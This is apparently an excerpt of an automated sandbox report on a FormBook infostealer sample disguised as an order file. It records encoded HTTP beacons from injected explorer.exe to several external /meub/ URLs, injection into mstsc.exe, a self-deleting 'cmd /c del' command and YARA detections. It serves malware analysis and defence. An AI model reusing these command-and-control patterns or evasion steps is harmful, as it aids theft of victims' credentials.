                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:41.394385099 CEST227OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=HA9QI0xR/eIEayTgXNJLcHJwamOlS6+rzTzzM4lOubNr4vQrzt8Snda4qRdcgxMYmUWA HTTP/1.1
                                                                      Host: www.tjanyancha.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449726104.164.26.24680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:47.347271919 CEST228OUTGET /meub/?ktI=VqHNClkDyt9S09rmrtZFTmOk0wmUkkyZtURD8RLTEyQOquxMghQjpEd/0gJKSXCP8Z6X&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.dmowang.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:51:47.953749895 CEST228INHTTP/1.1 301 Moved Permanently
                                                                      Location: /meub/index.jsp
                                                                      Server: Microsoft-IIS/7.5
                                                                      X-Powered-By: ASP.NET
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: GET, POST
                                                                      Date: Wed, 12 May 2021 08:51:49 GMT
                                                                      Connection: close
                                                                      Content-Length: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449727198.54.117.21680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:51:58.312855959 CEST229OUTGET /meub/?ktI=9ZO5voGbPxiLxNlgiLAc+dZNiPLY07W/lgUO8wfbTKsVjaeGgcbK9o/DChjFDdb4OPcD&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.pocopage.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.44972818.219.49.23880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:09.098130941 CEST233OUTGET /meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.goodcreditcardshome.info
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:09.267746925 CEST234INHTTP/1.1 302 Found
                                                                      content-length: 0
                                                                      location: https://www.goodcreditcardshome.info/meub/?ktI=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045evUyzXtuHZk&6lt4=M6ATVT20FLj
                                                                      cache-control: no-cache
                                                                      connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449729162.241.62.6380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:14.662301064 CEST234OUTGET /meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox HTTP/1.1
                                                                      Host: www.pasteleriaruth.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:14.828128099 CEST235INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 12 May 2021 08:52:14 GMT
                                                                      Server: Apache
                                                                      Location: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
                                                                      Content-Length: 338
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 61 73 74 65 6c 65 72 69 61 72 75 74 68 2e 63 6f 6d 2f 6d 65 75 62 2f 3f 36 6c 74 34 3d 4d 36 41 54 56 54 32 30 46 4c 6a 26 61 6d 70 3b 6b 74 49 3d 42 72 5a 44 78 72 74 37 38 52 34 4f 53 50 36 58 38 33 52 4a 51 38 49 38 79 69 30 61 2f 51 4a 67 69 45 61 79 73 35 64 6f 37 53 49 54 53 41 50 70 53 46 31 68 42 55 2f 4a 57 32 31 58 4c 42 51 77 45 33 4f 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.44973034.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 10:52:19.946628094 CEST236OUTGET /meub/?ktI=wuaJ69bwL+iBa6D7QaSRhbV0uekkoXOmRMeqk599uDu+rKjL/28r+d/9hZ/YryEoMLIX&6lt4=M6ATVT20FLj HTTP/1.1
                                                                      Host: www.amesshop.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 10:52:20.083381891 CEST237INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 08:52:20 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953af-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:10:50:13
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x80000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:10:50:16
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      Imagebase:0xe60000
                                                                      File size:736768 bytes
                                                                      MD5 hash:9E819BCC826E7A20B0FD139CC4185195
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:10:50:18
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:50:31
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                      Imagebase:0x9d0000
                                                                      File size:3444224 bytes
                                                                      MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:10:50:34
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:50:35
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >